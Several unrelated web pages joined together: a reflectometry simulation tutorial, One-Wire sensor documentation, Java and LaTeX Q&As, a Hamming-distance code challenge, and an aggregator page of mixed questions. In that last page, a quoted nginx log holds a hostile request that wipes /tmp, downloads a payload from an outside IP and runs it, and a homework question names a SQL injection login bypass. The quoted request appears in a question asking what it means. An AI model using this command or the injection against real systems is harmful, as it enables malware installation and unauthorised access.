\UpperCamelCase to \lowerCamelCase since ... • 7,886 1 vote Accepted ### How to position bullet on top of tabular? Use \begin{tabular*}{...}[t] to top align a tabular • 666k 1 vote Accepted ### Latex3 floating point calculations in longtblr (tabularray) Although I think it would be better to use functional library to do programming inside tabularray tables, you could still use expl3 if you want. You may compare this answer with another answer for a ... • 7,886 Only top scored, non community-wiki answers of a minimum length are eligible
2022-05-27 05:53:32
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9443949460983276, "perplexity": 13045.952800929723}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-21/segments/1652662636717.74/warc/CC-MAIN-20220527050925-20220527080925-00433.warc.gz"}
https://www.bornagainproject.org/documentation/tutorial-examples/reflectometry/beam-angular-divergence/
Beam Angualr Spread in Specular Simulations This example demonstrates beam angular spread effects in reflectivity computations. It also offers a comparison with data generated using another well known code: GenX. Further information about reflectometry simulations can be found in the Reflectometry Simulation Tutorial. The observed reflectometry signal can be affected either by a spread in the beam wavelength or in the incident angle. In this example, a Gaussian distribution is used to spread the incident angle, with a standard deviation of $\sigma_{\alpha} = 0.01^{\circ}$. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 """ An example of taking into account beam angular divergence and beam footprint correction in reflectometry calculations with BornAgain. """ import numpy as np import bornagain as ba from os import path # input parameters wavelength = 1.54 * ba.angstrom alpha_i_min = 0.0 * ba.deg # min incident angle, deg alpha_i_max = 2.0 * ba.deg # max incident angle, rad beam_sample_ratio = 0.01 # beam-to-sample size ratio # convolution parameters d_ang = 0.01 * ba.deg # spread width for incident angle n_sig = 3 # number of sigmas to convolve over n_points = 25 # number of points to convolve over # substrate (Si) si_sld_real = 2.0704e-06 # \AA^{-2} # layer parameters n_repetitions = 10 # Ni ni_sld_real = 9.4245e-06 # \AA^{-2} d_ni = 70 * ba.angstrom # Ti ti_sld_real = -1.9493e-06 # \AA^{-2} d_ti = 30 * ba.angstrom def get_sample(): # defining materials m_air = ba.MaterialBySLD("Air", 0.0, 0.0) m_ni = ba.MaterialBySLD("Ni", ni_sld_real, 0.0) m_ti = ba.MaterialBySLD("Ti", ti_sld_real, 0.0) m_substrate = ba.MaterialBySLD("SiSubstrate", si_sld_real, 0.0) air_layer = ba.Layer(m_air) ni_layer = ba.Layer(m_ni, d_ni) ti_layer = ba.Layer(m_ti, d_ti) substrate_layer = ba.Layer(m_substrate) multi_layer = ba.MultiLayer() multi_layer.addLayer(air_layer) for i in range(n_repetitions): multi_layer.addLayer(ti_layer) multi_layer.addLayer(ni_layer) multi_layer.addLayer(substrate_layer) return multi_layer def create_real_data(): """ Loading data from genx_angular_divergence.dat """ filepath = path.join(path.dirname(path.realpath(__file__)), "genx_angular_divergence.dat.gz") ax_values, real_data = np.loadtxt(filepath, usecols=(0, 1), skiprows=3, unpack=True) # translating axis values from double incident angle # to incident angle ax_values *= 0.5 return ax_values, real_data def get_simulation(scan_size=500): """ Returns a specular simulation with beam and detector defined. """ footprint = ba.FootprintFactorSquare(beam_sample_ratio) alpha_distr = ba.RangedDistributionGaussian(n_points, n_sig) scan = ba.AngularSpecScan(wavelength, scan_size, alpha_i_min, alpha_i_max) scan.setFootprintFactor(footprint) scan.setAbsoluteAngularResolution(alpha_distr, d_ang) simulation = ba.SpecularSimulation() simulation.setScan(scan) return simulation def run_simulation(): """ Runs simulation and returns it. """ sample = get_sample() simulation = get_simulation() simulation.setSample(sample) simulation.runSimulation() return simulation.result() def plot(results): """ :param results: :return: """ from matplotlib import pyplot as plt ba.plot_simulation_result(results, postpone_show=True) genx_axis, genx_values = create_real_data() plt.semilogy(genx_axis, genx_values, 'ko', markevery=300) plt.legend(['BornAgain', 'GenX'], loc='upper right') plt.show() if __name__ == '__main__': results = run_simulation() plot(results) BeamAngularDivergence.py
2019-10-17 11:04:57
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.4577828645706177, "perplexity": 3297.3957325722295}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-43/segments/1570986673538.21/warc/CC-MAIN-20191017095726-20191017123226-00508.warc.gz"}
https://docs.onion.io/omega2-docs/communicating-with-1w-devices.html
## Communicating with One-Wire Devices The One-Wire protocol is a bus-based protocol that, as the name implies, uses jsut one data wire to transmit data between devices. It allows controllers and processors like the Omega2 to easily communicate with peripheral devices like: • Sensors, such as temperature, humidity • Programmable Input/Output chips • Small relays ### The One-Wire Protocol One Wire is similar to the I2C protocol (which is coincidentally sometimes called TWI - Two Wire Interface). One Wire has a lower data transmission rate than I2C but it makes up for it with a longer range. It follows a master-slave architecture with each bus allowing for one master, in this case the Omega, and many slave devices. Every device type has its own unique single-byte (8 bit) identifier, eg. 0x8f. Each device in turn has its own unique 8-byte (64-bit) serial number that includes a byte to describe the device type, known as the family code, as the Least Significant Byte (LSB). An example of a One-Wire device serial number is shown below: One Wire is also referred to as 1W, 1-Wire, W1 etc. ### The Omega & One-Wire Interacting with One-Wire devices with the Omega is slightly different from I2C, SPI, and Serial devices, but you’ll see that it’s not a big deal. Since there is no dedicated hardware One-Wire controller on the Omega, your One-Wire device can be connected to any GPIO. We will then register a One-Wire master in Linux associated with the selected GPIO that will allow us to communicate with the One-Wire slave devices. Note that you need to be on firmware b151 or higher! ### Connecting the Hardware One-Wire devices will have three available connectors: • Vcc (usually 3.3V) • GND • Data Line Take a look at your specific sensor’s datasheet to identify the pins and determine the recommended voltage. Make the following connections to your Omega: Pin Omega Connection Vcc 3.3V GND GND Data GPIO19 Note that making these connections is very easy if you have a Expansion, Power, or Arduino Dock since they all expose the Omega’s GPIOs. Most GPIOs will work, but for now, let’s use GPIO19. Some One-Wire devices will require a pull-up resistor on the Data line. For example, the popular DS18B20 temperature sensor, requires a 4.7 kΩ pull-up resistor on the Data line to operate properly. Some One-Wire devices have built-in pull-up resistors or can require different resistance values, check the datasheet of your device to be sure! A pull-up resistor is a connection between, in this case, the data line and the voltage line. When the Data line is inactive, the pull up resistor will “pull” the signal to a logical high. Then when the Data line goes active, it will override the pull-up. It essentially ensures the logical level is always valid. ### Registering the One-Wire Master We will need to let our Linux operating system know that we intend to act as a One-Wire Master on GPIO19. So let’s run the following command: insmod w1-gpio-custom bus0=0,19,0 This command does the following: • Tells Linux to load the w1-gpio-custom kernel module that will allow the Omega to act as a One-Wire master • It defines that this will be bus0 • The 0,19,0 means: • This is for bus number 0 • Use GPIO19 as the data pin to communicate with the One-Wire devices • The final 0 indicates that we will not be setting the data pin to open drain mode If this command is successful, the following folder will become available: /sys/devices/w1_bus_master1 Take a look inside this directory, it will be our One-Wire command centre! #### Removing a One-Wire Master If you’re done using your One-Wire device and would like to have your GPIO back, you can disable the One-Wire Master by running the following command: rmmod w1-gpio-custom ### Finding One-Wire Slave Devices Now let’s use the new /sys/devices/w1_bus_master1 directory to find our slave devices. First let’s check to see if there are any slave devices at all: cat /sys/devices/w1_bus_master1/w1_master_slave_count The output will be a number that will tell us how many slave devices are connected: • If it is a 1, you already have your device plugged in and you’re good to go. • If you see a 0, go ahead and plug in your device. • The One-Wire bus master kernel module scans the data pin every 10 seconds for new devices so wait a little while and try again If your check of the slave count file reads 1, your device has been detected. Run ls /sys/devices/w1_bus_master1 and you should see a directory that looks something like this: 28-000123456789. That’s the directory of your slave device and it is based on the slave’s unique serial number. Note that each device will have a different serial number, so yours might look a little different. This makes it a little difficult to use One-Wire devices programmatically, but don’t worry there’s a solution! Running: cat /sys/devices/w1_bus_master1/w1_master_slaves will print a (newline delimited) list of the serial numbers of all connected One-Wire slaves! ### Reading from a One-Wire Device Reading from an attached One-Wire device is very simple, just run the following: cat /sys/devices/w1_bus_master1/<DeviceID>/w1_slave where <DeviceID> is the serial number of your One-Wire device. Using the DS18B20 temperature sensor from the section above the command would be: cat /sys/devices/w1_bus_master1/28-000123456789/w1_slave And it will print something like: b1 01 4b 46 7f ff 0c 10 d8 : crc=d8 YES b1 01 4b 46 7f ff 0c 10 d8 t=27062 Where the final t=27062 indicates the temperature is 27.062 ˚C. To trim and format the output so just the temperature is returned: root@Omega-2970:/# awk -F= '/t=/ {printf "%.03f\n", \$2/1000}' /sys/devices/w1_bus_master1/28-000123456789/w1_slave 27.062
2017-08-20 03:52:48
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.18704573810100555, "perplexity": 4209.345998820597}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-34/segments/1502886105970.61/warc/CC-MAIN-20170820034343-20170820054343-00434.warc.gz"}
https://www.tutorialspoint.com/period-plusmonths-method-in-java
# Period plusMonths() method in Java Java 8Object Oriented ProgrammingProgramming An immutable copy of the Period object where some months are added to it can be obtained using the plusMonths() method in the Period class in Java. This method requires a single parameter i.e. the number of months to be added and it returns the Period object with the added months. A program that demonstrates this is given as follows: ## Example Live Demo import java.time.Period; public class Demo { public static void main(String[] args) { String period = "P5Y7M15D"; Period p1 = Period.parse(period); System.out.println("The Period is: " + p1); Period p2 = p1.plusMonths(2); System.out.println("The Period after adding 2 months is: " + p2); } } ## Output The Period is: P5Y7M15D The Period after adding 2 months is: P5Y9M15D Now let us understand the above program. First the current Period is displayed. Then an immutable copy of the Period where 2 months are added is obtained using the plusMonths() method and this is displayed. A code snippet that demonstrates this is as follows: String period = "P5Y7M15D"; Period p1 = Period.parse(period); System.out.println("The Period is: " + p1); Period p2 = p1.plusMonths(2); System.out.println("The Period after adding 2 months is: " + p2); Updated on 30-Jul-2019 22:30:25
2022-08-17 17:30:40
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.4836355447769165, "perplexity": 3630.037337814041}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882573029.81/warc/CC-MAIN-20220817153027-20220817183027-00044.warc.gz"}
https://codegolf.stackexchange.com/questions/199145/estimate-the-mean-minimum-hamming-distance
# Estimate the mean minimum Hamming distance Inputs $$\b \leq 100\$$ and $$\n \geq 2\$$. Consider $$\n\$$ binary strings, each of length $$\b\$$ sampled uniformly and independently. We would like to compute the expected minimum Hamming distance between any pair. If $$\n = 2\$$ the answer is always $$\b/2\$$. Correctness Your code should ideally be within $$\\pm0.5\$$ of the correct mean. However, as I don't know what the correct mean is, for values of $$\n\$$ which are not too large I have computed an estimate and your code should be within $$\\pm0.5\$$ of my estimate (I believe my estimate is within $$\\pm0.1\$$ of the correct mean). For larger values than my independent tests will allow, your answer should explain why it is correct. • $$\b = 99, n = 2^{16}.\$$ Estimated avg. $$\19.61\$$. • $$\b = 89, n = 2^{16}.\$$ Estimated avg. $$\16.3\$$. • $$\b = 79, n = 2^{16}.\$$ Estimated avg. $$\13.09\$$. • $$\b = 69, n = 2^{16}.\$$ Estimated avg. $$\10.03\$$. • $$\b = 59, n = 2^{16}.\$$ Estimated avg. $$\7.03\$$. • $$\b = 99, n = 2^{15}.\$$ Estimated avg. $$\20.67\$$. • $$\b = 89, n = 2^{15}.\$$ Estimated avg. $$\17.26\$$. • $$\b = 79, n = 2^{15}.\$$ Estimated avg. $$\13.99\$$. • $$\b = 69, n = 2^{15}.\$$ Estimated avg. $$\10.73\$$. • $$\b = 59, n = 2^{15}.\$$ Estimated avg. $$\7.74\$$. • $$\b = 99, n = 2^{14}.\$$ Estimated avg. $$\21.65\$$. • $$\b = 89, n = 2^{14}.\$$ Estimated avg. $$\18.23\$$. • $$\b = 79, n = 2^{14}.\$$ Estimated avg. $$\14.83\$$. • $$\b = 69, n = 2^{14}.\$$ Estimated avg. $$\11.57\$$. • $$\b = 59, n = 2^{14}.\$$ Estimated avg. $$\8.46\$$. Score Your base score will be the number of the examples above that your code gets right within $$\\pm0.5\$$. On top of this you should add $$\x > 16\$$ for the largest $$\n = 2^x\$$ for which your code gives the right answer within $$\\pm0.5\$$ for all of $$\b = 59, 69, 79, 89, 99\$$ (and also all smaller values of $$\x\$$). That is, if your code can achieve this for $$\n=2^{18}\$$ then you should add $$\18\$$ to your score. You only get this extra score if you can also solve all the instances for all smaller $$\n\$$ as well. The number of strings $$\n\$$ will always be a power of two. Time limits For a single $$\n, b\$$ pair, your code should run on TIO without timing out. Rougher approximation answers for larger values of $$\n\$$ For larger values of $$\n\$$ my independent estimates will not be as accurate but may serve as a helpful guide nonetheless. I will add them here as I can compute them. • $$\b = 99, n = 2^{17}.\$$ Rough estimate $$\18.7\$$. • $$\b = 99, n = 2^{18}.\$$ Rough estimate $$\17.9\$$. • $$\b = 99, n = 2^{19}.\$$ Rough estimate $$\16.8\$$. • I thought this was posted on the Sandbox earlier today. – S.S. Anne Feb 8 '20 at 1:19 • @S.S.Anne Yes I posted it there first. I look forward to the first answers! – user9207 Feb 8 '20 at 6:38 • The time limit is probably unnecessary as it both limits users to tio languages and needlessly disqualifies solutions that take a long time, but do solve the problem. I understand wanting to prevent brute forcing, but I’d argue that should also be valid – ATaco Feb 8 '20 at 7:44 • @ATaco I understand that point of view but it completely changes the challenge. Brute force solutions are valid here of course. It's just a question of what score you get. The time limit/TIO is also crucial as otherwise you will just get a higher score by having a more powerful computer or leaving it to run for longer. – user9207 Feb 8 '20 at 7:48 • Using TIO for timing is not a good idea. Had you left this in the sandbox longer, I'd have suggested you switching to requiring that submissions pass your examples within a certain time limit which you would verify (like fastest-code). What you currently have makes it extremely difficult to determine what the score of any submission should actually be. – FryAmTheEggman Feb 8 '20 at 19:03 # Python 3, score = big(?) from math import exp, log, log1p def f(b, n): e = n * (n - 1) / 2 m = 0 c = 1 s = 0 t = 1 << b for k in range(b): s += c m += exp(e * (log1p(-s / t) if 2 * s < t else log((t - s) / t))) c = c * (b - k) // (k + 1) return m Try it online! The Hamming distance $$\D_{x, y}\$$ between any two of the strings ($$\1 \le x < y \le n\$$) is a random variable distributed as the Binomial distribution $$\B{\left(b, \tfrac12\right)}\$$: $$\Pr[D_{x, y} > k] = 1 - \frac{1}{2^b} \sum_{i=0}^k \binom bi.$$ Furthermore, any (distinct) two of these $$\\binom n2\$$ random variables are independent. If we make the incorrect but empirically useful assumption that all $$\\binom n2\$$ of these random variables are independent, then we can compute the distribution of their minimum $$\D = \min_{1 \le x < y \le n} D_{x,y}\$$ exactly: $$\begin{gather*} \Pr[D > k] = \left(1 - \frac{1}{2^b} \sum_{i=0}^k \binom bi\right)^{\binom n2}, \\ \mathbb E[D] = \sum_{k=0}^{b-1} \Pr[D > k]. \end{gather*}$$ This result can be computed extremely quickly and seems to be close enough. Numerical evidence suggests that the absolute error is worst at $$\b = 1, n = 3\$$ (where we estimate the expected minimum as $$\\tfrac18\$$ when it is actually $$\0\$$), and drops off quickly to zero as $$\b\$$ and/or $$\n\$$ get large. • Awesome! And quickly done too. – user9207 Feb 8 '20 at 11:37
2021-05-06 16:06:23
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 72, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9472216963768005, "perplexity": 705.6628091862016}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-21/segments/1620243988758.74/warc/CC-MAIN-20210506144716-20210506174716-00107.warc.gz"}
https://tex.stackexchange.com/questions/358460/paracol-have-column-wise-floats-numbered-in-order-of-appearance/358529
# paracol: have column-wise floats numbered in order of appearance? I'm typesetting (non-synchronized) parallel columns with paracol.sty – a translation actually, one language in the left, the other in the right column. The document contains a lot of "column-wise" floats (that is, floats typeset within a column). As paracol reads and processes the whole left column (stretching over various pages) before the right column, all the floats in the left column are numbered before the floats in the right column, even when they appear on a later page. This leads to the floats appearing in an unordered way given the linear appearance in the flow of the pages. Is there a way to work around this? I need to keep the floats as column-wise floats (so they may not break the two-column layout). Is there a way to modify the counter mechanism to have the numbers follow the order of appearance? Or at least in order of pages? (that is, within a page I don't mind if all left column floats are numbered before the right column floats, but this should not stretch across pages) Or do I have to implement a "manual" numbering using \setcounter{figure}{0} etc? Thanks a lot! PS: I know that the paracol manual says that this "problem" occurs. But maybe someone has an idea how to resolve it. MWE: \documentclass{article} \usepackage{paracol} \usepackage{lipsum} \globalcounter{figure} \begin{document} \begin{paracol}{2} \lipsum[1-3] \begin{figure}[t] \caption{The caption} \label{Label1} \end{figure} \lipsum[2] \switchcolumn \begin{figure}[t] \caption{The caption} \label{Label2} \end{figure} \lipsum[1-3] \end{paracol} \end{document} The following example shows figure 2 appearing before figure 1 if following the order of the pages. • The paracol manual explicitly states that t - float environments are problematic in synchronizing columns. You have t - float environments ;-) (requires caption package) – user31729 Mar 14 '17 at 18:19 • Yes I know, the manual mentions this. So it's not a bug report, but maybe someone has a solution! BTW, the problem doesn't depend on the 't' positioning, it also occurs with 'h'. The problem is that numbers are given in order of source code and the whole left column is processed and broken across pages before the right column is processed. – LaTechneuse Mar 14 '17 at 18:25 • Do you use hyperref and links? If not, there might be a easy solution. – user31729 Mar 14 '17 at 18:31 • Have you tried to remove the \globalcounter{figure} statement? – user31729 Mar 14 '17 at 18:35 • Removing the statement would produce separate numbering of the floats in each column, which is not what I'm looking for. And yes, alas, I'm using hyperref. – LaTechneuse Mar 14 '17 at 18:51 This will fix \caption, \label and \listoffigures. Note that it takes (at least) two runs. One must add \useparafig before \caption. It redefines \thefigure for the rest of the figure environment (or current group). It works by creating a translation table between \thefigure and the order in which the figures actually appear (\theparafig). \documentclass{article} \usepackage{paracol} \usepackage{lipsum} \globalcounter{figure} \newcounter{parafig} \newcommand{\newparafig}[1]{\stepcounter{parafig}% \expandafter\xdef\csname parafig#1\endcsname{\theparafig}} \makeatletter \newcommand{\useparafig}{\protected@write\@auxout{}{\string\newparafig{\thefigure}}% \@ifundefined{parafig\thefigure}{}% {\edef\parafig{\csname parafig\thefigure\endcsname}% \let\thefigure=\parafig}} \makeatother \begin{document} \listoffigures\newpage \sloppy \begin{paracol}{2} \lipsum[1-3] \begin{figure}[t] \useparafig \caption{The caption} \label{Label1} \end{figure} \lipsum[2] \switchcolumn \begin{figure}[t] \useparafig \caption{The caption} \label{Label2} \end{figure} \lipsum[1-3] \end{paracol} \end{document} • Thanks, that's an amazing solution! That makes paracol a very powerful solution for publishing two-column translations. – LaTechneuse Mar 15 '17 at 14:24
2020-08-14 14:24:06
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8483203053474426, "perplexity": 1799.217041779837}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-34/segments/1596439739328.66/warc/CC-MAIN-20200814130401-20200814160401-00014.warc.gz"}
https://proxies123.com/tag/log/
## calculus and analysis – Integral of \$r frac{2^{r-1} log (2) e^{-frac{sqrt{2^r-1}}{b}} left(2^r-1right)^{frac{d}{2}-1}}{b^d Gamma (d)}\$ with Mathematica I’m trying to find the integral given below with Mathematica $$int_0^{infty } r frac{2^{r-1} log (2) e^{-frac{sqrt{2^r-1}}{b}} left(2^r-1right)^{frac{d}{2}-1}}{b^d Gamma (d)} , dr$$ However, it takes too long for it to return something and when it returns it outputs the same integral. $$int_{0}^{infty } frac{2^{r-1} r log (2) b^{-d} e^{-frac{sqrt{2^r-1}}{b}} left(2^r-1right)^{frac{d}{2}-1}}{Gamma (d)} , dr$$ I’d like to figure out the solution for this integral. ## log analysis – Why request shell commands from nginx? I was playing around with nginx and noticed that within 1-2 hours of putting it online, I got entries like this in my logs: ``````170.81.46.70 - - "GET /shell?cd+/tmp;rm+-rf+*;wget+ 45.14.224.220/jaws;sh+/tmp/jaws HTTP/1.1" 301 169 "-" "Hello, world" 93.157.62.102 - - "GET / HTTP/1.1" 301 169 "http://(IP OF MY SERVER):80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0" 218.161.62.117 - - "GET / HTTP/1.1" 400 157 "-" "-" 61.96.64.130 - - "GET / HTTP/1.1" 400 157 "-" "-" `````` The IPs are, needless to say, not expected for this server. I assume these are automated hack attempts. But what is the logic of requesting shell commands from nginx? Is it common for nginx to allow access to a shell? Is it possible to tell what specific exploit was attacked from these entries? I state that I do not have a solid background in security. I am a software developer and I am writing here to start to reasoning about a new task (somehow related to security) that I have to implement and maybe someone of you can help me to clarify the situation. Basically I have to implement the following thing: an application produces logs (standard output text files) and I have to bring these logs into QRADAR SIEM. So my doubts are: 1. From what I know (absolutly not sure of this assertion): first of all I have to convert these log files into CEF format (Common Event Format) and I can give this format to QRADAR. It make sense for you? 2. What about the automatic import of this converted CEF format? QRADAR provides an API that I can call passing it the events or something similar? ## logging – Is it possible to lose logcat messages if I log too frequently? I instrument the app to make it log a message at the entry and exit of each method. The size of each message is about 12 characters. However I find some messages read from logcat are lost (I indexed each message to check this). E.g. (a – b means logs from a to b are missing) missing logs: 468 – 749 missing logs: 1308 – 1428 missing logs: 1725 – 1942 missing logs: 2023 – 2034 missing logs: 2375 – 2646 missing logs: 3075 – 3288 I also tried buffering the messages up to 400 characters then call Log.println() once it’s filled up, instead of calling Log.println() each time. When I do this, there’s no message lost. Since the size of messages totally is the same in both ways, the problem is not the size of logcat ring buffer (I also set the size to maximum: 256M). Is it because the app logs too frequently? ## Does pgBadger (PostgreSQL log analyzer) really not have a version for Windows? I need to figure out the bottleneck queries in my system. Since I remember using bgBadger years ago, in the era when I still tortured myself with Unix, I went to their website to fetch the Windows installer and start re-figuring out how to use it… There is no Windows installer. There is actually no mention of Windows whatsoever. Does this mean that this is one of those FOSS projects which pretend that Windows doesn’t exist and make it as difficult as possible to run it on the “one and only” desktop OS? I frankly expected that slick site to have a nice installer, which PostgreSQL and PostGIS have, but… apparently not? I strongly suspect that pgBadger is the best such software, but I’m also willing to listen if there is an excellent Windows-supporting alternative. PS: I don’t like Windows. It’s a living nightmare these days. It’s just that the “alternatives” are even worse in my long and consistent experience. Whether you agree with this or not, this is what I have been forced to conclude repeatedly over the last 20 years. ## sql injection – How can I write a function that will log a user in an old system without knowing any username or password? I’ll be more specific, I’m studying Internet Security and in my homeworks I must answer to the question that I will describe later; I learned something about code injection in older websites (using the string ‘ OR 1 == 1 // as username will login with any password provided); but what if password related to a username is stored in the server in a folder with the following path: which credentials will log me into the system, without knowing any legitimate usernames or passwords? Furthermore in the question it’s specified that the login system is installed on a computer running an OS, and that this operating system is known to have a file with its version (in this case, 1.0.3) in “/system/version.txt”. Honestly I do not know how this last thing can be related to the question, but I hope that someone can help me to understand what could be the right answer and if and how this thing about the system version is related to the answer. Thank you very much 🙂 ## Clear log files in /var/log Hi, I have a server with disk quota problem, I will do migration soon but need get some time until do this. Can I remove files in directory “/var/log” for get disk quota?: maillog-123456789: I have many files with this name cxs.log: I have only 1 file with this name, but her size is 273MB chkservd.log: I have only 1 file with this name, but her size is 103MB Thank you very much. ## Parse log of PostgreSQL into database I want to load information about queries execution from log of PostgreSQL to database table. I want such information as query execution time, query start time, query text. Does any simple solution exist?
2020-07-10 09:31:13
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 2, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.3289264738559723, "perplexity": 2120.9475618705005}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-29/segments/1593655906934.51/warc/CC-MAIN-20200710082212-20200710112212-00526.warc.gz"}
https://tug.org/pipermail/macostex-archives/2010-May/043796.html
